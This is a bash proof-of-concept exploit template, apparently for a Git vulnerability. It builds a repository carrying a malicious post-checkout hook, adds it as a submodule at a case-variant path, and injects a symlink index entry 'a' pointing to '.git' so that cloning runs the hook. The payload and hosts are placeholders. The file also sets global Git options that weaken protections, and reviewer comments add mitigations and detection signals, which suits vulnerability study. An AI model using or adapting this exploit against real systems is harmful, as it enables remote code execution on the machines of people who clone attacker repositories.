#!/bin/bash
# Lab template that builds two repositories (repo1 carrying a tracked hook
# script, repo2 referencing repo1 as a submodule plus a symlink index entry)
# and then clones repo2. <ip>, <port>, <name of the owner> and <Payload> are
# unfilled template placeholders; as written the shell would parse the angle
# brackets as redirections, so the file is not runnable unedited.
# NOTE(review): there is no `set -e` and no status check after `git clone` or
# `cd`, so a failed step does not stop the later rm/commit/push commands from
# running in whatever directory is current. Use a disposable VM or container.
#
# Configure Git to allow file protocol and enable symbolic links.
# These are --global writes: they persist in the invoking user's Git
# configuration after the script ends. protocol.file.allow=always relaxes
# Git's file-transport restriction for every later operation by this user.
# Record the previous values and restore them when the lab run is over.
git config --global protocol.file.allow always
git config --global core.symlinks true
git config --global init.defaultBranch main
# Clean up any existing repositories.
# Paths are relative to the current working directory; anything named repo1 or
# repo2 there is deleted without confirmation.
rm -rf repo1
rm -rf repo2
# Clone the malicious repository (repo1, which is later referenced as the
# submodule of repo2).
git clone http://<ip>:<port>/<name of the owner>/repo1.git
cd repo1
# Create a malicious post-checkout hook as an ordinary tracked file under
# y/hooks/ in the work tree (not under .git/hooks). The here-document
# delimiter is unquoted, so the shell expands $variables and $(...) in the
# body when this script runs, before the file is written.
# Defender note: an executable file named after a Git hook, inside a directory
# called hooks/ in tracked content, is a useful review and scanning signal.
mkdir -p y/hooks
cat > y/hooks/post-checkout <<EOF
#!/bin/sh
<Payload>
EOF
chmod +x y/hooks/post-checkout
# Add, commit, and push the malicious hook
git add y/hooks/post-checkout
git commit -m "Add malicious post-checkout hook"
git push
cd ..
# Clone another repository and set up the submodule.
# The submodule is registered under the name x/y but placed at path
# A/modules/x, so its name and its work-tree path differ.
git clone http://<ip>:<port>/<name of the owner>/repo2.git
cd repo2
git submodule add --name x/y "http://<ip>:<port>/<name of the owner>/repo1.git" A/modules/x
git commit -m "Add submodule"
# Create a symbolic link to the .git directory.
# The link is never created on disk: a blob containing the text ".git" is
# written to the object store, and an index entry with mode 120000 (symlink),
# stage 0 and path "a" is injected through update-index --index-info.
# Path "a" differs only by letter case from "A", the first component of the
# submodule path above.
# NOTE(review): presumably this relies on a case-insensitive filesystem
# treating "a" and "A" as the same entry at checkout; confirm against the
# advisory this PoC accompanies. Repository scanners can flag a symlink entry
# whose name case-folds to a directory component of a submodule path.
# dotgit.txt, dot-git.hash and index.info are scratch files that stay
# untracked in the repo2 work tree.
printf ".git" > dotgit.txt
git hash-object -w --stdin < dotgit.txt > dot-git.hash
printf "120000 %s 0\ta\n" "$(cat dot-git.hash)" > index.info
git update-index --index-info < index.info
git commit -m "Add symbolic link"
git push
# Clone the malicious repository to trigger the hook.
# The working directory is still repo2 here (there is no `cd ..`), so the
# clone lands in repo2/repo2.
# NOTE(review): whether any hook executes depends on the Git version, the
# filesystem and the clone options in use, none of which this script pins.
# Mitigations: run a patched Git release, keep core.symlinks=false where
# symlinks are not needed, and do not recurse into submodules of untrusted
# repositories.
git clone http://<ip>:<port>/<name of the owner>/repo2.git